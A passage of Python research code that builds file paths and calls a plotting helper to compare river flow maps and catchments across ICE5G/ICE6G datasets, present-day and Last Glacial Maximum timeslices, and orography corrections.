                                  "_163957_upscaled_updated.nc")
        data_filename=os.path.join(self.flow_maps_data_directory,
                                   "flowmap_ten_minute_data_from_virna_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask"
                                   "_plus_upscale_rdirs_tarasov_orog_corrs_{0}_upscaled_updated.nc".\
                                   format(tarasov_upscaled_data_datetime))
        lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                     "ls_mask_ten_minute_data_from_virna_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask"
                                     "_plus_upscale_rdirs_tarasov_orog_corrs_{0}_HD_transf.dat".\
                                     format(tarasov_upscaled_data_datetime))
        ref_catchment_filename=("catchmentmap_ten_minute_data_from_virna_lgm_ALG4_sinkless_no_true_sinks_oceans_"
                                "lsmask_plus_upscale_rdirs_20170127_163957_upscaled_updated.nc")
        data_catchment_filename=("catchmentmap_ten_minute_data_from_virna_lgm_ALG4_sinkless_no_true_sinks_oceans_"
                                 "lsmask_plus_upscale_rdirs_tarasov_orog_corrs_{0}_upscaled_updated.nc".\
                                 format(tarasov_upscaled_data_datetime))
        # NOTE(review): ref rdirs and reference rmouth outflows below point to
        # *0k* files although both flow maps are LGM -- confirm this is
        # intentional rather than a copy-paste left-over.
        ref_rdirs_filename=("generated/upscaled/upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true"
                            "_sinks_oceans_lsmask_plus_upscale_rdirs_20170123_165707.nc")
        reference_rmouth_outflows_filename=("/Users/thomasriddick/Documents/data/HDdata/rmouths/rmouthmap_ten_"
                                            "minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus"
                                            "_upscale_rdirs_20170123_165707_upscaled_updated.nc")
        data_rmouth_outflows_filename=("/Users/thomasriddick/Documents/data/HDdata/rmouths/rmouthmap_ten_minute_"
                                       "data_from_virna_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale"
                                       "_rdirs_tarasov_orog_corrs_{0}_upscaled_updated.nc".\
                                       format(tarasov_upscaled_data_datetime))
        glacier_mask_filename=os.path.join(self.orog_data_directory,"ice5g_v1_2_21_0k_10min.nc")
        # NOTE(review): labels "Present day"/"LGM" disagree with the docstring
        # (both datasets here are LGM) -- confirm the intended legend text.
        self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
                                                            data_flowmap_filename=data_filename,
                                                            ref_catchment_filename=\
                                                            ref_catchment_filename,
                                                            data_catchment_filename=\
                                                            data_catchment_filename,
                                                            ref_rdirs_filename=\
                                                            ref_rdirs_filename,
                                                            data_rdirs_filename=None,
                                                            reference_rmouth_outflows_filename=\
                                                            reference_rmouth_outflows_filename,
                                                            data_rmouth_outflows_filename=\
                                                            data_rmouth_outflows_filename,
                                                            lsmask_filename=lsmask_filename,
                                                            minflowcutoff=100,
                                                            flip_data=False,
                                                            rotate_data=True,
                                                            flip_ref=False,
                                                            rotate_ref=True,
                                                            lsmask_has_same_orientation_as_ref=False,
                                                            invert_ls_mask=True,
                                                            first_datasource_name="Present day",
                                                            second_datasource_name="LGM",
                                                            matching_parameter_set='extensive',
                                                            catchment_and_outflows_mods_list_filename=\
                                                            "catch_and_outflow_mods_lgm_vs_present_day.txt",
                                                            additional_matches_list_filename=\
                                                            "additional_matches_10min_upscaled_lgm_vs_present.txt",
                                                            use_single_color_for_discrepancies=True,
                                                            use_only_one_color_for_flowmap=False,
                                                            use_title=False,remove_antartica=True,
                                                            difference_in_catchment_label="Difference",
                                                            glacier_mask_filename=glacier_mask_filename,
                                                            glacier_mask_grid_type='LatLong10min',
                                                            flip_glacier_mask=True,
                                                            rotate_glacier_mask=True,
                                                            grid_type='HD')
    def upscaled_rdirs_with_and_without_tarasov_upscaled_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison(self):
        """Compare 0k upscaled river directions with and without tarasov-upscaled srtm30plus data.

        Reference: ICE5G-only flow map; data: ICE5G plus tarasov-upscaled
        srtm30plus flow map.

        Note this was adapted from previous code... not all variable names are accurate
        """
        # Timestamp identifying the tarasov-upscaled dataset generation
        data_label="20170511_163955"
        ref_filename=os.path.join(self.flow_maps_data_directory,
                                  'flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale'
                                  '_rdirs_20161031_113238_updated.nc')
        data_filename=os.path.join(self.flow_maps_data_directory,
                                   'flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless'
                                   '_downscaled_ls_mask_0k_upscale_rdirs_' + data_label + '_updated.nc')
        lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                     "ls_mask_extract_ls_mask_from_corrected_"
                                     "HD_rdirs_20160504_142435.nc")
        corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
                                                             "rmouthflows_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs"
                                                             "_20161031_113238_updated.nc")
        upscaled_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
                                                         "rmouthflows_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless_"
                                                         "downscaled_ls_mask_0k_upscale_rdirs_" + data_label + "_updated.nc")
        self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
                                                            data_flowmap_filename=data_filename,
                                                            ref_catchment_filename=\
                                                            "catchmentmap_ICE5G_data_ALG4_"
                                                            "sinkless_downscaled_ls_mask_0k_upscale_rdirs_20161031_113238_updated.nc",
                                                            data_catchment_filename="catchmentmap_ICE5G_and_tarasov_upscaled_"
                                                            "srtm30plus_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_"
                                                            "rdirs_" + data_label + "_updated.nc",
                                                            ref_rdirs_filename="generated/upscaled/upscaled_rdirs_ICE5G_data_ALG4_sinkless_downscaled_"
                                                            "ls_mask_0k_upscale_rdirs_20161031_113238_updated.nc",
                                                            data_rdirs_filename=None,
                                                            reference_rmouth_outflows_filename=\
                                                            corrected_hd_rdirs_rmouthoutflow_file,
                                                            data_rmouth_outflows_filename=\
                                                            upscaled_rdirs_rmouthoutflow_file,
                                                            lsmask_filename=lsmask_filename,
                                                            minflowcutoff=50,flip_data=False,
                                                            rotate_data=True,flip_ref=True,rotate_ref=True,
                                                            lsmask_has_same_orientation_as_ref=False,
                                                            invert_ls_mask=False,
                                                            first_datasource_name="Reference",
                                                            matching_parameter_set='magnitude_extensive',
                                                            use_single_color_for_discrepancies=True,
                                                            second_datasource_name="Data",grid_type='HD')
    def upscaled_rdirs_with_and_without_tarasov_upscaled_north_america_only_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison(self):
        """Compare 0k upscaled river directions with and without tarasov-upscaled data (North America only).

        Reference: ICE5G-only flow map; data: ICE5G plus tarasov-upscaled
        srtm30plus data restricted to North America.

        Note this was adapted from previous code... not all variable names are accurate
        """
        # Timestamps identifying the data and reference dataset generations
        data_label="20170511_230901"
        ref_label="20170507_135726"
        ref_filename=os.path.join(self.flow_maps_data_directory,
                                  'flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale'
                                  '_rdirs_{0}_updated.nc'.format(ref_label))
        data_filename=os.path.join(self.flow_maps_data_directory,
                                   'flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_north_america_only_data_ALG4_sinkless'
                                   '_downscaled_ls_mask_0k_upscale_rdirs_' + data_label + '_updated.nc')
        lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                     "ls_mask_extract_ls_mask_from_corrected_"
                                     "HD_rdirs_20160504_142435.nc")
        corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
                                                             "rmouthflows_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs"
                                                             "_{0}_updated.nc".format(ref_label))
        upscaled_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
                                                         "rmouthflows_ICE5G_and_tarasov_upscaled_srtm30plus_north_america_only_"
                                                         "data_ALG4_sinkless_"
                                                         "downscaled_ls_mask_0k_upscale_rdirs_" + data_label + "_updated.nc")
        self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
                                                            data_flowmap_filename=data_filename,
                                                            ref_catchment_filename=\
                                                            "catchmentmap_ICE5G_data_ALG4_"
                                                            "sinkless_downscaled_ls_mask_0k_upscale_rdirs_{0}_updated.nc"\
                                                            .format(ref_label),
                                                            data_catchment_filename="catchmentmap_ICE5G_and_tarasov_upscaled_"
                                                            "srtm30plus_north_america_only_data_ALG4_sinkless_downscaled_ls_"
                                                            "mask_0k_upscale_rdirs_" + data_label + "_updated.nc",
                                                            ref_rdirs_filename="generated/upscaled/upscaled_rdirs_ICE5G_data"
                                                            "_ALG4_sinkless_downscaled_"
                                                            "ls_mask_0k_upscale_rdirs_{0}_updated.nc".format(ref_label),
                                                            data_rdirs_filename=None,
                                                            reference_rmouth_outflows_filename=\
                                                            corrected_hd_rdirs_rmouthoutflow_file,
                                                            data_rmouth_outflows_filename=\
                                                            upscaled_rdirs_rmouthoutflow_file,
                                                            lsmask_filename=lsmask_filename,
                                                            minflowcutoff=50,flip_data=False,
                                                            rotate_data=True,flip_ref=False,rotate_ref=True,
                                                            lsmask_has_same_orientation_as_ref=False,
                                                            invert_ls_mask=False,
                                                            first_datasource_name="Reference",
                                                            matching_parameter_set='magnitude_extensive',
                                                            use_single_color_for_discrepancies=True,
                                                            second_datasource_name="Data",grid_type='HD')
    def Upscaled_Rdirs_vs_Corrected_HD_Rdirs_tarasov_upscaled_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison(self):
        """Compare tarasov-upscaled 0k river directions against corrected HD directions.

        Plots the flow map from ICE5G plus tarasov-upscaled srtm30plus data
        against the corrected HD reference flow map with selected catchments
        overlaid in three colour groups; river lists are (lat,lon) index
        pairs of river mouths on the HD grid.
        """
        # Timestamp identifying the tarasov-upscaled dataset generation
        data_label="20170508_021105"
        ref_filename=os.path.join(self.flow_maps_data_directory,
                                  'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
        data_filename=os.path.join(self.flow_maps_data_directory,
                                   'flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless'
                                   '_downscaled_ls_mask_0k_upscale_rdirs_' + data_label + '_updated.nc')
        lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                     "ls_mask_extract_ls_mask_from_corrected_"
                                     "HD_rdirs_20160504_142435.nc")
        corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
                                                             "rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
        upscaled_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
                                                         "rmouthflows_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless_"
                                                         "downscaled_ls_mask_0k_upscale_rdirs_" + data_label + "_updated.nc")
        self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
                                                            data_flowmap_filename=data_filename,
                                                            ref_catchment_filename=\
                                                            "catchmentmap_corrected_HD_rdirs_"
                                                            "post_processing_20160427_141158.nc",
                                                            data_catchment_filename="catchmentmap_ICE5G_and_tarasov_upscaled_"
                                                            "srtm30plus_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_"
                                                            "rdirs_" + data_label + "_updated.nc",
                                                            ref_rdirs_filename="rivdir_vs_1_9_data_from_stefan.nc",
                                                            data_rdirs_filename=None,
                                                            reference_rmouth_outflows_filename=\
                                                            corrected_hd_rdirs_rmouthoutflow_file,
                                                            data_rmouth_outflows_filename=\
                                                            upscaled_rdirs_rmouthoutflow_file,
                                                            lsmask_filename=lsmask_filename,
                                                            minflowcutoff=100,flip_data=False,
                                                            rotate_data=True,flip_ref=False,rotate_ref=False,
                                                            lsmask_has_same_orientation_as_ref=False,
                                                            invert_ls_mask=False,
                                                            first_datasource_name="Reference",
                                                            matching_parameter_set='extensive',
                                                            rivers_to_plot=[(117,424),(121,176),(179,260),
                                                                            (160,573),(40,90),(217,432),
                                                                            (104,598),(46,504),(252,638),
                                                                            (32,612),(132,494),(171,371),
                                                                            (50,439),(121,456),(40,682),
                                                                            (88,430)],
                                                            rivers_to_plot_alt_color=[(192,384),(82,223),
                                                                                      (249,244),(117,603),
                                                                                      (35,521),(144,548),
                                                                                      (72,641),(54,29),
                                                                                      (88,457),(62,173),
                                                                                      (91,111),(125,165),
                                                                                      (159,235),(237,392),
                                                                                      (36,660),(51,717),
                                                                                      (33,603),(90,418),
                                                                                      (89,482),(111,380)],
                                                            rivers_to_plot_secondary_alt_color=[(64,175),
                                                                                                (42,468),
                                                                                                (32,577),
                                                                                                (43,508),
                                                                                                (117,130),
                                                                                                (230,427),
                                                                                                (36,631),
                                                                                                (86,436),
                                                                                                (55,174),
                                                                                                (82,113),
                                                                                                (60,416),
                                                                                                (154,388),
                                                                                                (136,536),
                                                                                                (201,286)],
                                                            use_single_color_for_discrepancies=True,
                                                            catchment_and_outflows_mods_list_filename=\
                                                            "catch_and_outflow_mods_ice5g_10min_upscaled_"
                                                            "rdirs_vs_modern_day.txt",
                                                            second_datasource_name="Data",grid_type='HD')
def Upscaled_Rdirs_vs_Corrected_HD_Rdirs_tarasov_upscaled_north_america_only_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison(self):
    """Compare upscaled river directions against the corrected HD river directions.

    Data set: ICE5G plus tarasov-upscaled srtm30plus, North America only,
    ALG4 sinkless, corrected orography, downscaled 0k land-sea mask.
    Assembles the flow-map, catchment, land-sea-mask and river-mouth-outflow
    filenames for both data sets and delegates the actual plotting to
    FlowMapTwoColourComparisonWithCatchmentsHelper.
    """
    # Timestamp labelling the generation run of the upscaled data set
    data_label="20170511_230901"
    ref_filename=os.path.join(self.flow_maps_data_directory,
                              'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
    data_filename=os.path.join(self.flow_maps_data_directory,
                               'flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_north_america_only_data_ALG4_sinkless'
                               '_downscaled_ls_mask_0k_upscale_rdirs_' + data_label + '_updated.nc')
    lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                 "ls_mask_extract_ls_mask_from_corrected_"
                                 "HD_rdirs_20160504_142435.nc")
    corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
                                                         "rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
    upscaled_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
                                                     "rmouthflows_ICE5G_and_tarasov_upscaled_srtm30plus_north_america_only"
                                                     "_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs_"
                                                     + data_label + "_updated.nc")
    # Data set is rotated (not flipped) relative to the reference HD grid
    self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
                                                        data_flowmap_filename=data_filename,
                                                        ref_catchment_filename=\
                                                        "catchmentmap_corrected_HD_rdirs_"
                                                        "post_processing_20160427_141158.nc",
                                                        data_catchment_filename="catchmentmap_ICE5G_and_tarasov_upscaled_"
                                                        "srtm30plus_north_america_only_data_ALG4_sinkless_downscaled_ls_"
                                                        "mask_0k_upscale_rdirs_" + data_label + "_updated.nc",
                                                        ref_rdirs_filename="rivdir_vs_1_9_data_from_stefan.nc",
                                                        data_rdirs_filename=None,
                                                        reference_rmouth_outflows_filename=\
                                                        corrected_hd_rdirs_rmouthoutflow_file,
                                                        data_rmouth_outflows_filename=\
                                                        upscaled_rdirs_rmouthoutflow_file,
                                                        lsmask_filename=lsmask_filename,
                                                        minflowcutoff=100,flip_data=False,
                                                        rotate_data=True,flip_ref=False,rotate_ref=False,
                                                        lsmask_has_same_orientation_as_ref=False,
                                                        invert_ls_mask=False,
                                                        first_datasource_name="Reference",
                                                        matching_parameter_set='extensive',
                                                        # Rivers given as (lat,lon) HD grid indices - TODO confirm ordering
                                                        rivers_to_plot=[(117,424),(121,176),(179,260),
                                                                        (160,573),(40,90),(217,432),
                                                                        (104,598),(46,504),(252,638),
                                                                        (32,612),(132,494),(171,371),
                                                                        (50,439),(121,456),(40,682),
                                                                        (88,430)],
                                                        rivers_to_plot_alt_color=[(192,384),(82,223),
                                                                                  (249,244),(117,603),
                                                                                  (35,521),(144,548),
                                                                                  (72,641),(54,29),
                                                                                  (88,457),(62,173),
                                                                                  (91,111),(125,165),
                                                                                  (159,235),(237,392),
                                                                                  (36,660),(51,717),
                                                                                  (33,603),(90,418),
                                                                                  (89,482),(111,380)],
                                                        rivers_to_plot_secondary_alt_color=[(64,175),
                                                                                            (42,468),
                                                                                            (32,577),
                                                                                            (43,508),
                                                                                            (117,130),
                                                                                            (230,427),
                                                                                            (36,631),
                                                                                            (86,436),
                                                                                            (55,174),
                                                                                            (82,113),
                                                                                            (60,416),
                                                                                            (154,388),
                                                                                            (136,536),
                                                                                            (201,286)],
                                                        use_single_color_for_discrepancies=True,
                                                        catchment_and_outflows_mods_list_filename=\
                                                        "catch_and_outflow_mods_ice5g_10min_upscaled_"
                                                        "rdirs_vs_modern_day.txt",
                                                        second_datasource_name="Data",grid_type='HD')
def Upscaled_Rdirs_vs_Corrected_HD_Rdirs_tarasov_upscaled_north_america_only_data_ALG4_corr_orog_glcc_olson_lsmask_0k_FlowMap_comparison(self):
    """Compare upscaled river directions against the corrected HD river directions.

    Variant of the downscaled-ls-mask comparison above that instead uses the
    GLCC Olson derived 0k land-sea mask (ICE5G plus tarasov-upscaled
    srtm30plus, North America only, ALG4 sinkless, corrected orography).
    Builds the input filenames and delegates the plotting to
    FlowMapTwoColourComparisonWithCatchmentsHelper.
    """
    # Timestamp labelling the generation run of the upscaled data set
    data_label="20170517_004128"
    ref_filename=os.path.join(self.flow_maps_data_directory,
                              'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
    data_filename=os.path.join(self.flow_maps_data_directory,
                               'flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_north_america_only_data_ALG4_sinkless'
                               '_glcc_olson_lsmask_0k_upscale_rdirs_' + data_label + '_updated.nc')
    lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                 "ls_mask_recreate_connected_HD_lsmask_"
                                 "from_glcc_olson_data_20170513_195421.nc")
    corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
                                                         "rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
    upscaled_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
                                                     "rmouthflows_ICE5G_and_tarasov_upscaled_srtm30plus_north_america_only"
                                                     "_data_ALG4_sinkless_glcc_olson_lsmask_0k_upscale_rdirs_"
                                                     + data_label + "_updated.nc")
    self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
                                                        data_flowmap_filename=data_filename,
                                                        ref_catchment_filename=\
                                                        "catchmentmap_corrected_HD_rdirs_"
                                                        "post_processing_20160427_141158.nc",
                                                        data_catchment_filename="catchmentmap_ICE5G_and_tarasov_upscaled_"
                                                        "srtm30plus_north_america_only_data_ALG4_sinkless_glcc"
                                                        "_olson_lsmask_0k_upscale_rdirs_" + data_label + "_updated.nc",
                                                        ref_rdirs_filename="rivdir_vs_1_9_data_from_stefan.nc",
                                                        data_rdirs_filename=None,
                                                        reference_rmouth_outflows_filename=\
                                                        corrected_hd_rdirs_rmouthoutflow_file,
                                                        data_rmouth_outflows_filename=\
                                                        upscaled_rdirs_rmouthoutflow_file,
                                                        lsmask_filename=lsmask_filename,
                                                        minflowcutoff=100,flip_data=False,
                                                        rotate_data=True,flip_ref=False,rotate_ref=False,
                                                        lsmask_has_same_orientation_as_ref=False,
                                                        # Unlike the sibling method the GLCC Olson mask needs rotating
                                                        flip_lsmask=False,rotate_lsmask=True,
                                                        invert_ls_mask=False,
                                                        first_datasource_name="Reference",
                                                        matching_parameter_set='magnitude_extensive',
                                                        additional_truesink_matches_list_filename=\
                                                        "additional_truesink_matches_ice5g_upscaled_"
                                                        "present_with_glcc_lsmask_vs_manual_HD_rdirs.txt",
                                                        rivers_to_plot=[(117,424),(121,176),(179,260),
                                                                        (160,573),(40,90),(217,432),
                                                                        (104,598),(46,504),(252,638),
                                                                        (32,612),(132,494),(171,371),
                                                                        (50,439),(121,456),(40,682),
                                                                        (88,430)],
                                                        rivers_to_plot_alt_color=[(192,384),(82,223),
                                                                                  (249,244),(117,603),
                                                                                  (35,521),(144,548),
                                                                                  (72,641),(54,29),
                                                                                  (88,457),(62,173),
                                                                                  (91,111),(125,165),
                                                                                  (159,235),(237,392),
                                                                                  (36,660),(51,717),
                                                                                  (33,603),(90,418),
                                                                                  (89,482),(111,380)],
                                                        rivers_to_plot_secondary_alt_color=[(64,175),
                                                                                            (42,468),
                                                                                            (32,577),
                                                                                            (43,508),
                                                                                            (117,130),
                                                                                            (230,427),
                                                                                            (36,631),
                                                                                            (86,436),
                                                                                            (55,174),
                                                                                            (82,113),
                                                                                            (60,416),
                                                                                            (154,388),
                                                                                            (136,536),
                                                                                            (201,286)],
                                                        use_single_color_for_discrepancies=True,
                                                        catchment_and_outflows_mods_list_filename=\
                                                        "catch_and_outflow_mods_ice5g_10min_upscaled_"
                                                        "rdirs_vs_modern_day_glcc_olson_lsmask.txt",
                                                        second_datasource_name="Data",grid_type='HD')
def compare_present_day_and_lgm_river_directions_with_catchments_ICE5G_plus_tarasov_style_orog_corrs_for_both(self):
    """Compare LGM to present using ICE5G data plus tarasov style orography corrections for both times

    Builds the flow-map, land-sea-mask, catchment, river-direction,
    river-mouth-outflow and glacier-mask filenames for the two timeslices
    and delegates the plotting to FlowMapTwoColourComparisonWithCatchmentsHelper.
    """
    # Timestamps identifying the generation runs of the two data sets
    present_day_data_datetime = "20170521_002051"
    lgm_data_datetime = "20170521_151723"
    ref_filename=os.path.join(self.flow_maps_data_directory,
                              "flowmap_ICE5G_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_tarasov"
                              "_orog_corrs_generation_and_upscaling_{0}_upscaled_updated.nc".\
                              format(present_day_data_datetime))
    data_filename=os.path.join(self.flow_maps_data_directory,
                               "flowmap_ICE5G_21k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_"
                               "tarasov_orog_corrs_generation_and_upscaling_{0}_upscaled_updated.nc".\
                               format(lgm_data_datetime))
    # The land-sea mask comes from the LGM (21k) timeslice
    lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                 "ls_mask_ICE5G_21k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs"
                                 "_tarasov_orog_corrs_generation_and_upscaling_{0}_HD_transf.dat".\
                                 format(lgm_data_datetime))
    ref_catchment_filename=("catchmentmap_ICE5G_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_"
                            "tarasov_orog_corrs_generation_and_upscaling_{0}_upscaled_updated.nc".\
                            format(present_day_data_datetime))
    data_catchment_filename=("catchmentmap_ICE5G_21k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs"
                             "_tarasov_orog_corrs_generation_and_upscaling_{0}_upscaled_updated.nc".\
                             format(lgm_data_datetime))
    ref_rdirs_filename=("generated/upscaled/upscaled_rdirs_ICE5G_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_"
                        "plus_upscale_rdirs_tarasov_orog_corrs_generation_and_upscaling_{0}_upscaled_"
                        "updated_transf.dat".format(present_day_data_datetime))
    reference_rmouth_outflows_filename=os.path.join(self.rmouth_outflow_data_directory,
                                                    "rmouthflows_ICE5G_0k_ALG4_sinkless_no_true_sinks_oceans_"
                                                    "lsmask_plus_upscale_rdirs_tarasov_orog_corrs"
                                                    "_generation_and_upscaling_{0}_upscaled_updated.nc".\
                                                    format(present_day_data_datetime))
    data_rmouth_outflows_filename=os.path.join(self.rmouth_outflow_data_directory,
                                               "rmouthflows_ICE5G_21k_ALG4_sinkless_no_true_sinks_oceans_"
                                               "lsmask_plus_upscale_rdirs_tarasov_orog_corrs_"
                                               "generation_and_upscaling_{0}_upscaled_updated.nc".\
                                               format(lgm_data_datetime))
    # Glacier mask is read from the ICE5G v1.2 21k 10-minute file
    glacier_mask_filename=os.path.join(self.orog_data_directory,"ice5g_v1_2_21_0k_10min.nc")
    self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
                                                        data_flowmap_filename=data_filename,
                                                        ref_catchment_filename=\
                                                        ref_catchment_filename,
                                                        data_catchment_filename=\
                                                        data_catchment_filename,
                                                        ref_rdirs_filename=\
                                                        ref_rdirs_filename,
                                                        data_rdirs_filename=None,
                                                        reference_rmouth_outflows_filename=\
                                                        reference_rmouth_outflows_filename,
                                                        data_rmouth_outflows_filename=\
                                                        data_rmouth_outflows_filename,
                                                        lsmask_filename=lsmask_filename,
                                                        minflowcutoff=100,
                                                        flip_data=False,
                                                        rotate_data=True,
                                                        flip_ref=False,
                                                        rotate_ref=True,
                                                        lsmask_has_same_orientation_as_ref=False,
                                                        invert_ls_mask=True,
                                                        first_datasource_name="Present day",
                                                        second_datasource_name="LGM",
                                                        matching_parameter_set='extensive',
                                                        catchment_and_outflows_mods_list_filename=\
                                                        "catch_and_outflow_mods_lgm_vs_present_day.txt",
                                                        additional_matches_list_filename=\
                                                        "additional_matches_10min_upscaled_lgm_vs_present.txt",
                                                        use_single_color_for_discrepancies=True,
                                                        use_only_one_color_for_flowmap=False,
                                                        use_title=False,remove_antartica=True,
                                                        difference_in_catchment_label="Difference",
                                                        glacier_mask_filename=glacier_mask_filename,
                                                        glacier_mask_grid_type='LatLong10min',
                                                        flip_glacier_mask=True,
                                                        rotate_glacier_mask=True,
                                                        grid_type='HD')
def compare_present_day_and_lgm_river_directions_with_catchments_ICE6G_plus_tarasov_style_orog_corrs_for_both(self):
    """Compare LGM to present using ICE6G data plus tarasov style orography corrections for both times

    Builds the flow-map, land-sea-mask, catchment, river-direction,
    river-mouth-outflow and glacier-mask filenames for the two timeslices
    and delegates the plotting to FlowMapTwoColourComparisonWithCatchmentsHelper.
    """
    # Timestamps identifying the generation runs of the two data sets
    present_day_data_datetime = "20170612_202721"
    lgm_data_datetime = "20170612_202559"
    ref_filename=os.path.join(self.flow_maps_data_directory,
                              "flowmap_ICE6g_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_tarasov"
                              "_orog_corrs_{0}_upscaled_updated.nc".\
                              format(present_day_data_datetime))
    data_filename=os.path.join(self.flow_maps_data_directory,
                               "flowmap_ICE6g_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_"
                               "tarasov_orog_corrs_{0}_upscaled_updated.nc".\
                               format(lgm_data_datetime))
    # Primary mask is the LGM one; the present-day mask is passed separately below
    lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                 "ls_mask_ICE6g_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs"
                                 "_tarasov_orog_corrs_{0}_HD_transf.nc".\
                                 format(lgm_data_datetime))
    extra_lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                       "ls_mask_ICE6g_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale"
                                       "_rdirs_tarasov_orog_corrs_{0}_HD_transf.nc".\
                                       format(present_day_data_datetime))
    ref_catchment_filename=("catchmentmap_ICE6g_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_"
                            "tarasov_orog_corrs_{0}_upscaled_updated.nc".\
                            format(present_day_data_datetime))
    data_catchment_filename=("catchmentmap_ICE6g_lgm_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs"
                             "_tarasov_orog_corrs_{0}_upscaled_updated.nc".\
                             format(lgm_data_datetime))
    ref_rdirs_filename=("generated/upscaled/upscaled_rdirs_ICE6g_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_"
                        "plus_upscale_rdirs_tarasov_orog_corrs_{0}_upscaled_"
                        "updated.nc".format(present_day_data_datetime))
    reference_rmouth_outflows_filename=os.path.join(self.rmouth_outflow_data_directory,
                                                    "rmouthflows_ICE6g_0k_ALG4_sinkless_no_true_sinks_oceans_"
                                                    "lsmask_plus_upscale_rdirs_tarasov_orog_corrs"
                                                    "_{0}_upscaled_updated.nc".\
                                                    format(present_day_data_datetime))
    data_rmouth_outflows_filename=os.path.join(self.rmouth_outflow_data_directory,
                                               "rmouthflows_ICE6g_lgm_ALG4_sinkless_no_true_sinks_oceans_"
                                               "lsmask_plus_upscale_rdirs_tarasov_orog_corrs_"
                                               "{0}_upscaled_updated.nc".\
                                               format(lgm_data_datetime))
    # Glacier mask is read from the ICE6G VM5a 21k 10-minute file
    glacier_mask_filename=os.path.join(self.orog_data_directory,"Ice6g_c_VM5a_10min_21k.nc")
    self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,
                                                        data_flowmap_filename=data_filename,
                                                        ref_catchment_filename=\
                                                        ref_catchment_filename,
                                                        data_catchment_filename=\
                                                        data_catchment_filename,
                                                        ref_rdirs_filename=\
                                                        ref_rdirs_filename,
                                                        data_rdirs_filename=None,
                                                        reference_rmouth_outflows_filename=\
                                                        reference_rmouth_outflows_filename,
                                                        data_rmouth_outflows_filename=\
                                                        data_rmouth_outflows_filename,
                                                        lsmask_filename=lsmask_filename,
                                                        # Lower cutoff than the ICE5G variant (75 vs 100)
                                                        minflowcutoff=75,
